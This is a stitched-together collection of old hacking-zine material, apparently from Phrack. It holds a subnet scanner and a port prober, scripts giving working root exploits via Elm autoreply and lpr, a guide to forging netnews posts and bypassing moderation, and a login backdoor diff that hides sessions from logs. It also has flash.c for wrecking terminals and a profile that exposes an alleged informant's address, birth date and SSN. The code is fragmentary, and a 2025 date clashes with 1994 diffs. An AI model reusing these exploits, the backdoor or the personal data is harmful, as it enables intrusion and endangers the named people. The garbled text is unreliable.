while (answer.status == TRUE) {
bzero((caddr_t) &answer, sizeof(struct ypresp_key_val));
signal(SIGALRM, timeout);
errcode = callrpc(server, YPPROG, YPVERS, calltype, xdr_proc,
reqp, xdr_ypresp_key_val, &answer);
if (errcode != RPC_SUCCESS)
* Got something; print it.
if (answer.status == TRUE) {
printf("%.*s\n", answer.valdat.dsize,
* Now we're requesting the next item, so have to
* send back the current key.
calltype = YPPROC_NEXT;
reqp = (caddr_t) &keyreq;
xdr_proc = xdr_ypreq_key;
if (keyreq.keydat.dptr)
keyreq.keydat = answer.keydat;
if (answer.valdat.dptr)
* get_yp_maplist - get the yp map list for yp domain "domain" from server.
get_yp_maplist(server, domain)
char *server, *domain;
bool_t yesno;
extern void timeout();
struct ypmaplist *mpl;
enum clnt_stat errcode;
struct ypresp_maplist maplist;
* This code isn't needed; the next call will give the same
* error message if there's no yp server there.
#ifdef not_necessary
* "Ping" the yp server and see if it's there.
signal(SIGALRM, timeout);
errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
xdr_void, 0);
if (errcode != RPC_SUCCESS)
* Figure out whether server serves the yp domain we want.
signal(SIGALRM, timeout);
errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
xdr_wrapstring, (caddr_t) &domain, xdr_bool,
(caddr_t) &yesno);
if (errcode != RPC_SUCCESS)
* Nope...
if (yesno == FALSE) {
fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
server, domain);
maplist.list = (struct ypmaplist *) NULL;
* Now ask for the list.
signal(SIGALRM, timeout);
errcode = callrpc(server, YPPROG, YPVERS, YPPROC_MAPLIST,
xdr_wrapstring, (caddr_t) &domain,
xdr_ypresp_maplist, &maplist);
if (errcode != RPC_SUCCESS)
if (maplist.status != YP_TRUE) {
fprintf(stderr, "%s: cannot get map list: %s\n", pname,
* Print out the list.
for (mpl = maplist.list; mpl != NULL; mpl = mpl->ypml_next)
printf("%s\n", mpl->ypml_name);
* print_rpc_err - print an rpc error and exit.
enum clnt_stat errcode;
fprintf(stderr, "%s: %s\n", pname, clnt_sperrno(errcode));
* timeout - print a timeout and exit.
void timeout()
fprintf(stderr, "%s: RPC request (callrpc) timed out.\n", pname);
#!/bin/perl -s
# Scan a subnet for valid hosts; if given hostname, will look at the
# 255 possible hosts on that net. Report if host is running rexd or
# ypserv.
# Usage: scan n.n.n.n
# mine, by default
$default = "130.80.26";
$| = 1;
if ($v) { $verbose = 1; }
if ($#ARGV == -1) { $root = $default; }
else { $root = $ARGV[0]; }
# ip address
if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) {
($na, $ad, $ty, $le, @host_ip) = gethostbyname($root);
($one,$two,$three,$four) = unpack('C4',$host_ip[0]);
$root = "$one.$two.$three";
if ($root eq "..") { die "Can't figure out what to scan...\n"; }
print "Subnet $root:\n" if $verbose;
for $i (01..255) {
print "Trying $root.$i\t=> " if $verbose;
# Do the work
sub resolve {
local($name) = @_;
# ip address
if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) {
($a,$b,$c,$d) = split(/\./, $name);
@ip = ($a,$b,$c,$d);
($name) = gethostbyaddr(pack("C4", @ip), &AF_INET);
else {
($name, $aliases, $type, $len, @ip) = gethostbyname($name);
($a,$b,$c,$d) = unpack('C4',$ip[0]);
if ($name && @ip) {
print "$a.$b.$c.$d\t$name\n";
system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005
> /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/nu
ll ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ;
then echo \"R
unning ypserv.\"\nfi\nfi");
else { print "unable to resolve address\n" if $verbose; }
sub AF_INET {2;}
* probe_tcp_ports
#define RETURN_ERR -1
#define RETURN_FAIL 0
int Debug;
int Hack;
int Verbose;
main(ArgC, ArgV)
int ArgC;
char **ArgV;
int Index;
int SubIndex;
for (Index = 1; (Index < ArgC) && (ArgV[Index][0] == '-'); Index++)
for (SubIndex = 1; ArgV[Index][SubIndex]; SubIndex++)
switch (ArgV[Index][SubIndex])
case 'd':
case 'h':
case 'v':
(void) fprintf(stderr,
"Usage: probe_tcp_ports [-dhv] [hostname [hostname ...] ]\n");
for (; Index < ArgC; Index++)
(void) Probe_TCP_Ports(ArgV[Index]);
char *Name;
unsigned Port;
char *Host;
struct hostent *HostEntryPointer;
struct sockaddr_in SocketInetAddr;
struct hostent TargetHost;
struct in_addr TargetHostAddr;
char *AddressList[1];
char NameBuffer[128];
extern int inet_addr();
extern char *rindex();
if (Name == NULL)
return (RETURN_FAIL);
Host = Name;
if (Host == NULL)
return (RETURN_FAIL);
HostEntryPointer = gethostbyname(Host);
if (HostEntryPointer == NULL)
TargetHostAddr.s_addr = inet_addr(Host);
if (TargetHostAddr.s_addr == -1)
(void) printf("unknown host: %s\n", Host);
return (RETURN_FAIL);
(void) strcpy(NameBuffer, Host);
TargetHost.h_name = NameBuffer;
TargetHost.h_addr_list = AddressList, TargetHost.h_addr =
(char *) &TargetHostAddr;
TargetHost.h_length = sizeof(struct in_addr);
TargetHost.h_addrtype = AF_INET;
TargetHost.h_aliases = 0;
HostEntryPointer = &TargetHost;
SocketInetAddr.sin_family = HostEntryPointer->h_addrtype;
bcopy(HostEntryPointer->h_addr, (char *) &SocketInetAddr.sin_addr,
for (Port = 1; Port < 65536; Port++)
(void) Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr);
Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr)
unsigned Port;
struct hostent *HostEntryPointer;
struct sockaddr_in SocketInetAddr;
char Buffer[BUFSIZ];
int SocketDescriptor;
struct servent *ServiceEntryPointer;
SocketInetAddr.sin_port = Port;
SocketDescriptor = socket(AF_INET, SOCK_STREAM, 6);
if (SocketDescriptor < 0)
return (RETURN_ERR);
if (Verbose)
(void) printf("Host %s, Port %d ", HostEntryPointer->h_name,
if ((ServiceEntryPointer = getservbyport(Port, "tcp")) !=
(struct servent *) NULL)
(void) printf(" (\"%s\" service) ",
(void) printf("connection ... ");
(void) fflush(stdout);
if (connect(SocketDescriptor, (char *) &SocketInetAddr,
sizeof(SocketInetAddr)) < 0)
if (Verbose)
(void) printf("NOT open.\n");
if (Debug)
if (!Verbose)
(void) printf("Host %s, Port %d ",
HostEntryPointer->h_name, Port);
if ((ServiceEntryPointer = getservbyport(Port,"tcp")) !=
(struct servent *) NULL)
(void) printf(" (\"%s\" service) ",
(void) printf("connection ... ");
(void) fflush(stdout);
(void) printf("open.\n");
if (Hack)
(void) sprintf(Buffer, "/usr/ucb/telnet %s %d",
HostEntryPointer->h_name, Port);
(void) system(Buffer);
(void) close(SocketDescriptor);
autoreply(1) (/usr/local/bin/autoreply)
Supplied with the Elm Mail System
Any system with a standard installation of The Elm Mail System.
All versions are believed to have this vulnerability.
autoreply(1) can be used to create root owned files, with mode
666. It can also overwrite any file with semi user-controlled
Any user with access to autoreply(1) can alter system files and
thus become root.
This example demonstrates how to become root on most affected
machines by modifying root's .rhosts file. Please do not do
this unless you have permission.
Create the following script, 'fixrhosts':
8<--------------------------- cut here ----------------------------
# fixrhosts rhosts-file user machine
if [ $# -ne 3 ]; then
echo "Usage: `basename $0` rhosts-file user machine"
exit 1
cd $HOME
echo x > "a
umask 022
autoreply "a
cat > /tmp/.rhosts.sh.$$ << 'EOF'
ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
exec autoreply off
exit 0
/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
rm -f /tmp/.rhosts.sh.$$ "a
exit 0
8<--------------------------- cut here ----------------------------
(Lines marked with > represent user input)
> % id
uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % ./fixrhosts ~root/.rhosts 8lgm localhost
You've been added to the autoreply system.
You've been removed from the autoreply table.
> % rsh localhost -l root csh -i
Warning: no access to tty.
Thus no job control in this shell.
1. Disable autoreply.
2. Wait for a patch from the Elm maintainers.
lpr(1) (/usr/ucb/lpr or /usr/bin/lpr)
SunOS 4.1.1 or earlier
BSD 4.3
BSD NET/2 Derived Systems
A/UX 2.0.1
Most systems supporting the BSD LP subsystem
lpr(1) can be used to overwrite or create (and become owner of)
any file on the system. lpr -s allows users to create symbolic
links in lpd's spool directory (typically /var/spool/lpd).
After 1000 invocations of lpr, lpr will reuse the filename in
the spool directory, and follow the link previously installed.
It will thus overwrite/create any file that this link points too.
Any user with access to lpr(1) can alter system files and thus
become root.
This example demonstrates how to become root on most affected
machines by modifying /etc/passwd and /etc/group. Please do
not do this unless you have permission.
Create the following script, 'lprcp':
8<--------------------------- cut here ----------------------------
#!/bin/csh -f
# Usage: lprcp from-file to-file
if ($#argv != 2) then
echo Usage: lprcp from-file to-file
exit 1
# This link stuff allows us to overwrite unreadable files,
# should we want to.
echo x > /tmp/.tmp.$$
lpr -q -s /tmp/.tmp.$$
rm -f /tmp/.tmp.$$ # lpr's accepted it, point it
ln -s $2 /tmp/.tmp.$$ # to where we really want
@ s = 0
while ( $s != 999) # loop 999 times
lpr /nofile >&/dev/null # doesn't exist, but spins the clock!
@ s++
if ( $s % 10 == 0 ) echo -n .
lpr $1 # incoming file
# user becomes owner
rm -f /tmp/.tmp.$$
exit 0
8<--------------------------- cut here ----------------------------
(Lines marked with > represent user input)
Make copies of /etc/passwd and /etc/group, and modify them:
> % id
uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % cp /etc/passwd /tmp/passwd
> % ex /tmp/passwd
/tmp/passwd: unmodified: line 42
> :a
> 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
> .
> :wq
/tmp/passwd: 43 lines, 2188 characters.
> % cp /etc/group /tmp
> % ex /tmp/group
/tmp/group: unmodified: line 49
> :/wheel
> :c
> wheel:*:0:root,operator,8lgm
> .
> :wq
/tmp/group: 49 lines, 944 characters.
Install our new files:
> % ./lprcp /tmp/group /etc/group
lpr: cannot rename /var/spool/lpd/cfA060testnode
> % ./lprcp /tmp/passwd /etc/passwd
lpr: cannot rename /var/spool/lpd/cfA061testnode
Check it worked:
> % ls -l /etc/passwd /etc/group
-rw-r--r-- 1 8lgm 944 Mar 3 19:56 /etc/group
-rw-r--r-- 1 8lgm 2188 Mar 3 19:59 /etc/passwd
> % head -1 /etc/group
> % grep '^8lgmroot' /etc/passwd
8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
Become root and tidy up:
> % su 8lgmroot
# chown root /etc/passwd /etc/group
# rm -f /tmp/passwd /tmp/group
1. Contact your vendor for a fix.
2. In the meantime, apply the following patch, derived from
BSD NET/2 source, which will correct the flaw on most
affected systems:
Anonymous netnews without "anonymous" remailers
Save any news article to a file. We'll call it "hak" in this example.
Edit hak, and remove any header lines of the form
From some!random!path!user (note: "From ", not "From: " !!)
Shorten the Path: header down to its LAST two or three "bangized" components.
This is to make the article look like it was posted from where it really was
posted, and originally hit the net at or near the host you send it to. Or
you can construct a completely new Path: line to reflect your assumed alias.
Make some change to the Message-ID: field, that isn't likely to be
duplicated anywhere. This is usually best done by adding a couple of
random characters to the part before the @, since news posting programs
generally use a fixed-length field to generate these IDs.
Change the other headers to say what you like -- From:, Newsgroups:,
Sender:, etc. Replace the original message text with your message.
If you are posting to a moderated group, remember to put in an Approved:
header to bypass the moderation mechanism.
Write out the changed file, and send it to your favorite NNTP server that
permits transfers via the IHAVE command, using the following script:
#! /bin/sh
## Post an article via IHAVE.
## args: filename server
if test "$2" = "" ; then
echo usage: $0 filename server
exit 1
if test ! -f $1 ; then
echo $1: not found
exit 1
# suck msg-id out of headers, keep the brackets
msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
sed 's/.*-[Ii][Dd]: //'`
echo $msgid
( sleep 5
echo IHAVE $msgid
sleep 3
cat $1
sleep 1
echo "."
sleep 1
echo QUIT ) | telnet $2 119
If your article doesn't appear in a day or two, try a different server.
They are easy to find. Here's a script that will break a large file
full of saved netnews into a list of hosts to try. Edit the output
of this if you want, to remove obvious peoples' names and other trash.
#! /bin/sh
FGV='fgrep -i -v'
egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
Once you have your host list, feed it to the following script.
#! /bin/sh
while read xx ; do
if test "$xx" = "" ; then continue;
echo === $xx
( echo open $xx 119
sleep 5
echo ihave k00l@x.edu
sleep 4
echo .
echo quit
sleep 1
echo quit
) | telnet
If the above script is called "findem" and you're using csh, you should do
findem < list >& outfile
so that ALL output from telnet is captured. This takes a long time, but when
it finishes, edit "outfile" and look for occurrences of "335". These mark
answers from servers that might be willing to accept an article. This isn't a
completely reliable indication, since some servers respond with acceptance and
later drop articles. Try a given server with a slightly modified repeat of
someone else's message, and see if it eventually appears.
You will notice other servers that don't necessarily take an IHAVE, but
say "posting ok". You can probably do regular POSTS through these, but they
will add an "NNTP-Posting-Host: " header containing the machine YOU came from.
Magic Login - Written by Data King - 7 July 2025
This program code is released on the understanding that neither the
author or Phrack Magazine suggest that you implement this on **ANY**
system that you are not authorized to do so. The author provides this
implementation of a "Magic" login as a learning exercise in security
Sorry for the disclaimer readers but I was advised by the AFP (Australian
Federal Police) that if I ever released this code they would bust me for
aiding and abetting. I am releasing it anyway as I believe in the right of
people to KNOW, but not necessarily to DO.
As always I can be emailed at dking@suburbia.apana.org.au
(Please note:- I have a NEW pgp signature.)
Briefly I am going to explain what a "Magic" login is and some of the steps you
need to go through to receive the desired result. At the end of this article is
a diff that can be applied to the shadow-3.2.2-linux archive to implement some
of these ideas.
A "Magic" login is a modified login program that allows the user to login
without knowing the correct password for the account they are logging into.
This is a very simple programming exercise and can be done by almost anyone, bu
a really effective "Magic" login program will do much more than this. The
features of the supplied "Magic" login are:
- Will login to any valid account as long as you know the Magic password.
- Hides you in UTMP
- Does not Log to WTMP
- Allows Root Login from NON authorized Terminals
- Preserves the Lastlogin information (ie Keeps it as though you had never
logged in with the magic password)
- Produces a binary that is exactly the same length as the original binary
I am not going to go into great detail here on how to write such a system as
this. The code is very simple and it contains plenty of comments, so just look
there for ideas.
For this system to have less chance of being detected you need to do several
First select a "Magic" password that is not easily identifiable by stringing th
binary. This is why in the example I have used the word "CONSOLE", this word
already appears several times in the binary so detection of one more is
Admittedly I could of encrypted the "Magic" password, but I decided against thi
for several reasons.
The second thing you would need to do if you where illegally placing a "Magic"
login on a system would be to ensure that the admins are not doing CRC checks o
SUID(0) programs, or if they are that you change the CRC record of login to
match the CRC record of the "Magic" login.
Thirdly do not forget to make the date and time stamp of the new binary match
the old ones.
To install a new /bin/login on a system you will need to be root, now if you ar
already root why would you bother? Simple, it is just one more backdoor that yo
can use to get back in if you are detected.
This version of the "Magic" login program does not have the following features,
I leave it entirely up to you about implementing something to fix them:
- Shells & Programs show up in the Process Table
- tty Ownership and attributes
- /proc filesystem
Any one of these to an alert system admin will show that there is an "invisible
user on the system. However it has been my experience that most admin's rarely
look at these things, or if they do they can not see the wood for the trees.
diff -c /root/work/login/console.c /root/work/logon/console.c
*** /root/work/login/console.c Sun Oct 11 07:16:47 1992
--- /root/work/logon/console.c Sat Jun 4 15:29:15 1994
*** 21,26 ****
--- 21,27 ----
extern char *getdef_str();
+ extern int magik;
* tty - return 1 if the "tty" is a console device, else 0.
*** 47,52 ****
--- 48,57 ----
if ((console = getdef_str("CONSOLE")) == NULL)
return 1;
+ /* Fix for Magic Login - UnAuth Console - Data King */
+ if (magik==1)
+ return 1;
* If this isn't a filename, then it is a ":" delimited list of
* console devices upon which root logins are allowed.
diff -c /root/work/login/lmain.c /root/work/logon/lmain.c
*** /root/work/login/lmain.c Mon Oct 12 17:35:06 1992
--- /root/work/logon/lmain.c Sat Jun 4 15:30:37 1994
*** 105,110 ****
--- 105,111 ----
char *Prog;
int newenvc = 0;
int maxenv = MAXENV;
+ int magik; /* Global Flag for Magic Login - Data King */
* External identifiers.
diff -c /root/work/login/log.c /root/work/logon/log.c
*** /root/work/login/log.c Mon Oct 12 17:35:07 1992
--- /root/work/logon/log.c Sat Jun 4 15:37:22 1994
*** 53,58 ****
--- 53,59 ----
extern struct passwd pwent;
extern struct lastlog lastlog;
extern char **environ;
+ extern char magik;
long lseek ();
time_t time ();
*** 83,89 ****
(void) time (&newlog.ll_time);
(void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line);
(void) lseek (fd, offset, 0);
! (void) write (fd, (char *) &newlog, sizeof newlog);
(void) close (fd);
--- 84,93 ----
(void) time (&newlog.ll_time);
(void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line);
(void) lseek (fd, offset, 0);
! if (magik !=1) /* Dont Modify Last login Specs if this is a Magic */
! { /* login - Data King */
! (void) write (fd, (char *) &newlog, sizeof newlog);
! }
(void) close (fd);
diff -c /root/work/login/utmp.c /root/work/logon/utmp.c
*** /root/work/login/utmp.c Mon Oct 12 17:35:36 1992
--- /root/work/logon/utmp.c Sat Jun 4 15:41:13 1994
*** 70,75 ****
--- 70,77 ----
extern long lseek();
#endif /* SVR4 */
+ extern int magik;
#define NO_UTENT \
"No utmp entry. You must exec \"login\" from the lowest level \"sh\""
#define NO_TTY \
*** 353,368 ****
* Scribble out the new entry and close the file. We're done
* with UTMP, next we do WTMP (which is real easy, put it on
! * the end of the file.
! (void) write (fd, &utmp, sizeof utmp);
! (void) close (fd);
! if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) {
(void) write (fd, &utmp, sizeof utmp);
(void) close (fd);
- utent = utmp;
#endif /* SVR4 */
--- 355,372 ----
* Scribble out the new entry and close the file. We're done
* with UTMP, next we do WTMP (which is real easy, put it on
! * the end of the file. If Magic Login, DONT write out UTMP - Data King
! if (magik !=1)
! {
(void) write (fd, &utmp, sizeof utmp);
(void) close (fd);
+ if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) {
+ (void) write (fd, &utmp, sizeof utmp);
+ (void) close (fd);
+ }
+ utent = utmp;
#endif /* SVR4 */
diff -c /root/work/login/valid.c /root/work/logon/valid.c
*** /root/work/login/valid.c Sun Oct 11 07:16:55 1992
--- /root/work/logon/valid.c Sat Jun 4 15:47:28 1994
*** 25,30 ****
--- 25,32 ----
static char _sccsid[] = "@(#)valid.c 3.4 08:44:15 9/12/91";
+ extern int magik;
* valid - compare encrypted passwords
*** 43,48 ****
--- 45,64 ----
char *encrypt;
char *salt;
char *pw_encrypt ();
+ char *magic;
+ /*
+ * Below is the piece of code that checks to see if the password
+ * supplied by the user = the Magic Password - Data King
+ */
+ magic = "CONSOLE"; /* Define this as the Magic Password - Data King */
+ if (strcmp(password,magic) == 0)
+ {
+ magik = 1;
+ return(1);
+ }
* Start with blank or empty password entries. Always encrypt
/* flash.c */
/* This little program is intended to quickly mess up a user's
terminal by issuing a talk request to that person and sending
vt100 escape characters that force the user to logout or kill
his/her xterm in order to regain a sane view of the text.
It the user's message mode is set to off (mesg n) he/she will
be unharmed.
This program is really nasty :-)
Usage: flash user@host
try compiling with: gcc -o flash flash.c
/* this should really be in an include file.. */
#define OLD_NAME_SIZE 9
#define NAME_SIZE 12
#define TTY_SIZE 16
typedef struct {
char type;
char l_name[OLD_NAME_SIZE];
char r_name[OLD_NAME_SIZE];
char filler;
u_long id_num;
u_long pid;
char r_tty[TTY_SIZE];
struct sockaddr_in addr;
struct sockaddr_in ctl_addr;
typedef struct {
u_char vers;
char type;
u_short filler;
u_long id_num;
struct sockaddr_in addr;
struct sockaddr_in ctl_addr;
long pid;
char l_name[NAME_SIZE];
char r_name[NAME_SIZE];
char r_tty[TTY_SIZE];
#define TALK_VERSION 1 /* protocol version */
/* Types */
#define LEAVE_INVITE 0
#define LOOK_UP 1
#define DELETE 2
#define ANNOUNCE 3
int current = 1; /* current id.. this to avoid duplications */
struct sockaddr_in *getinaddr(char *hostname, u_short port)
static struct sockaddr addr;
struct sockaddr_in *address;
struct hostent *host;
address = (struct sockaddr_in *)&addr;
(void) bzero( (char *)address, sizeof(struct sockaddr_in) );
/* fill in the easy fields */
address->sin_family = AF_INET;
address->sin_port = htons(port);
/* first, check if the address is an ip address */
address->sin_addr.s_addr = inet_addr(hostname);
if ( (int)address->sin_addr.s_addr == -1)
/* it wasn't.. so we try it as a long host name */
host = gethostbyname(hostname);
if (host)
/* wow. It's a host name.. set the fields */
/* ?? address->sin_family = host->h_addrtype; */
bcopy( host->h_addr, (char *)&address->sin_addr,
/* oops.. can't find it.. */
puts("Couldn't find address");
return (struct sockaddr_in *)0;
/* all done. */
return (struct sockaddr_in *)address;
SendTalkPacket(struct sockaddr_in *target, char *p, int psize)
int s;
struct sockaddr sample; /* not used.. only to get the size */
s = socket(AF_INET, SOCK_DGRAM, 0);
sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) );
new_ANNOUNCE(char *hostname, char *remote, char *local)
CTL_MSG packet;
struct sockaddr_in *address;
/* create a packet */
address = getinaddr(hostname, 666 );
address->sin_family = htons(AF_INET);
bzero( (char *)&packet, sizeof(packet) );
packet.vers = TALK_VERSION;
packet.type = ANNOUNCE;
packet.pid = getpid();
packet.id_num = current;
bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
strncpy( packet.l_name, local, NAME_SIZE);
strncpy( packet.r_name, remote, NAME_SIZE);
strncpy( packet.r_tty, "", 1);
SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) );
old_ANNOUNCE(char *hostname, char *remote, char *local)
OLD_MSG packet;
struct sockaddr_in *address;
/* create a packet */
address = getinaddr(hostname, 666 );
address->sin_family = htons(AF_INET);
bzero( (char *)&packet, sizeof(packet) );
packet.type = ANNOUNCE;
packet.pid = getpid();
packet.id_num = current;
bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
strncpy( packet.l_name, local, NAME_SIZE);
strncpy( packet.r_name, remote, NAME_SIZE);
strncpy( packet.r_tty, "", 1);
SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) );
main(int argc, char *argv[])
char *hostname, *username;
int pid;
if ( (pid = fork()) == -1)
if ( !pid )
if (argc < 2) {
puts("Usage: ");
username = argv[1];
if ( (hostname = (char *)strchr(username, '@')) == NULL )
puts("Invalid name. ");
*hostname = '\0';
if (*username == '~')
#define FIRST "\033c\033(0\033#8"
#define SECOND "\033[1;3r\033[J"
#define THIRD "\033[5m\033[?5h"
new_ANNOUNCE(hostname, username, FIRST);
old_ANNOUNCE(hostname, username, FIRST);
new_ANNOUNCE(hostname, username, SECOND);
new_ANNOUNCE(hostname, username, SECOND);
new_ANNOUNCE(hostname, username, THIRD);
old_ANNOUNCE(hostname, username, THIRD);
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 5 of 28
-:[ Phrack Pro-Phile ]:-
This issue our prophile introduces you to one of the craziest people
I've ever met from the Underground. And coming from a complete loon
like me, that's saying something. This guy is a real Renaissance Man:
Hacker, programmer, burglar, convict, star of stage and screen...
Of course, that someone could only be:
Minor Threat
Personal Info:
Handle: Minor Threat
Call him: MT, minor, lamer
Born: 1972 in Walnut Creek, California
Age: 22
Height: 6'1"
Weight: 155 lbs
e-mail: mthreat@paranoia.com
www: http://www.paranoia.com/~mthreat/
Affiliations: Dark Side Research
Computers owned: 1981: IBM PC
1982: none
1984: PCjr
1988: XT Clone
1990: 386/25 Clone
1992: Too many to legally list
1994: Pentium & 486
How I got started
In 1981, my dad worked for IBM. In October of that year, he
brought home a PC, and I jumped on BASIC. It wasn't until 1984 that
I got my first modem. I had just moved to Florida with my dad, and
he had a modem. I met some other kids with computers and modems and
they taught me what modems were for: "You call other people's
computers and try to get their passwords and intercept their mail".
(That's what I was taught!) It wasn't until a few months later I
realized that this wasn't the actual purpose of BBSs and modems.
My first BBS was the Towne Crier BBS at FAU (Florida Atlantic
University), 305-393-3891 (I still remember that damn number), but
the NPA has since changed to 407. We thought it was so cool when
we logged on as "All" and deleted all the messages posted to "All".
In about 1985, I moved back to Austin. I screwed around for
several years without doing any real hacking. When I got to high
school, I wanted to change my grades like in War Games, so I looked
through the counselor's office until I found a number to the
Education Service Center. I had to scan a whole _100_ numbers
(929-13xx) to find the HP3000 dialup. Once I found it, I had no
idea what to do. I gave the number to a friend in high school,
who gave it to some of his hacker friends. They hacked it and gave
it back to me, complete with a full list of passwords and commands.
It turns out, the two Austin hackers who did it were The Mentor and
Erik Bloodaxe, but I didn't know that for another 3 years.
Shortly after this, I picked my permanent handle. Minor Threat
was an early-to-mid 1980's punk band from Washington, DC. They're no
longer together, but Fugazi is pretty good and Ian McKaye (from
Minor Threat) is in Fugazi. I actually got the handle off of one
of my sister's tapes, before I even heard them. But now I like the
music too.
Eventually, I found a local pirate board, met all the local
pirates, and got into the warez scene for a while. I joined PE
(Public Enemy), the pirate group. (I cracked the warez!) Warez were
only so fun, so I looked for other stuff. I met some VMB lamers and
got into that scene for about a month, and got bored again.
This was 1990, our 950s were running out, and we needed another
way to call out. So I took an old VMB hacking program I had
written, and changed it around to scan for tones, in random order
to avoid Ma Bell problems. I nicknamed it ToneLoc, short for Tone-
Locator. I gave it to some friends (Alexis Machine & Marko Ramius)
and eventually, it ended up on some warez boards. It got pretty
popular, so I made a version that worked for more people, called
it 0.90, and released it. Then I lost the source in a hard drive
crash, and stopped working on it.
I was 18 and mom said it was time to get out of her house, so
I got my own apartment. Marko Ramius and I learned about trashing
central offices, and gained COSMOS access. We barely knew what
COSMOS was .. I knew I had read about it in old Phrack articles, and
I remembered that it was "elite." Our problem was, we still knew no
other "real" hackers, and we had to learn COSMOS. After trashing
and trashing, we still had no COSMOS manuals. We had to get them
somehow. I can't say how, I'll leave it to your imagination.
Marko and I started breaking in buildings and got pretty
good at it. We had about a 60% success rate I would guess. But we
never stole anything -- we just looked for cool information. In
1991, we got caught in a building, and got charged with Criminal
Trespassing. We both got probation for a Class A misdemeanor.
We decided it was time to stop breaking in buildings.
Late in 1991, I got e-mail on a bulletin board from someone
named Mucho Maas. He said he had gotten ToneLoc and wanted a
few new features. I told him I had lost the current source and
all I had was an old (0.85) source. He said he would take the
old source, add the new features, and bring it up-to-date with
the current source. So he did, and we released ToneLoc 0.95.
If it weren't for Mucho, ToneLoc would still be at version 0.90,
and anyone who ran 0.90 knows how hard it was to get it running
About the same time, I was getting on a few BBSs in the
Washington DC area. (Pentavia was the best while it was up).
I met several people there... including a guy named Codec. Codec
was mostly a phone phreak, but did a little hacking as well. But
when it came to PBX's, he was a master. Not only had he exploited
PBXs for free long distance use like the rest of us, but he had
actually REMOVED entire PBX systems from buildings! (See his
article on how to do this, Phrack 43, article 15). But he had
also gotten caught and was on federal probation.
A few months after I met Codec, he had an 'incident'
and was on the run again. I agreed to let him live with me, so
he flew down and moved in. We got a 2 bedroom place, and set
the place up d0pe. There were over 9 phone extensions, (not
including cordless), and about the same number of computers (Most
of which were Codec's). We had the funnest 3 months ever ...
but about 2 weeks after SummerCon 1992, we got arrested.
Favorite things
Women: w0w
Music: Sonic Youth, Cure, Fugazi, Minor Threat, Orb, B-Boys,
Jane's Addiction.
Favorite Book: 1984
My Car: 1990 300ZX Twin Turbo, Wolf Chip mod to 360
horsepower. It's fucking fast.
Favorite Movies: Jackie Chan movies, The Killer, Reservoir Dogs,
The Lost Boys, Near Dark, Hardware.
Favorite TV: MacGyver
What are some of your most memorable experiences?
Being polygraphed by the Secret Service in 1991 for something having
to do with some lamer threatening the president on an Alliance
Teleconference. I failed the polygraph the first time, then I
passed it the second time. (How's that for the government?)
Eventually, some other 15-year old got probation for doing it.
Being arrested with Codec in 1992. He ran, outran the cops, jumped
a fence about 8 feet tall, and eventually got in a struggle with
a cop over the his gun (Officer Sheldon Salsbury, Austin PD). The
gun went off, and we were both booked on attempted capital murder.
It turned out that the bullet hit no one, and all the blood was from
the cop hitting himself in the head with his own gun, although the
cop claims that Codec hit him in the forehead with a 2-meter ham
radio from like 20 feet away. Right. A search warrant was executed
on our apartment, and approximately $800,000 worth of AT&T Switching
equipment was seized from Codec's closet. It turns out, we were
narced on and set-up by :
Jon R. Massengale
6501 Deer Hollow
Austin, TX 78750
DOB: 9-7-62
SSN: 463-92-0306
Being the first in Texas to have Caller-ID, before it was legally
Losing control of my car at 140mph, doing a slow 360 at about 120,
living through it, and not doing too much damage to my car.
Good times:
Going up to Seattle to visit Cerebrum in May 1993, seeing Fugazi,
getting our car towed, then reading the dialups to the towing
company's xenix (login: sysadm). Finally getting our Oki 900's
to clone/tumble/do other d0pe things. Calling each other on
our Okis from 5 feet away, putting them together and causing
Setting up my apartment with Codec with a 10-station Merlin system,
and a 9-station network.
SummerCon 1993. "Culmination of Coolness." Sorry, can't say any
Some People To Mention:
There are a lot of people who I would like to mention that have helped
me greatly and who I have known for a very long time:
Marko Ramius - First pirate/hacker I really knew in person. We
did a lot of crazy shit together.
Alexis Machine - Second hacker-type I met, and a true Warez Kid.
(that's a complement!)
Mucho Maas - Brought back ToneLoc from the dead. Always told
me what I shouldn't do, and always said "I told
you so" when I got busted.
Codec - I had some of the funnest times of my life with
Codec... unfortunately, it was so much fun it was
illegal, and we got busted.
Cerebrum - Very cool friend who got narced on by a fuckhead
named Zach, 206-364-0660. Cerebrum is serving
a 10 month federal sentence in a nice prison camp
in Sheridan, Oregon. He gets out about December
10, 1994.
The Conflict - Unfortunately, I can't tell you. Maybe in about 8
more years.
ESAC Administrator - "Have you been drinking on the job?"
What I'm up to now
When I heard that the next Phrack Pro-phile was going to be about
me, I realized, "I must be retired". It's probably true.. at least I hope
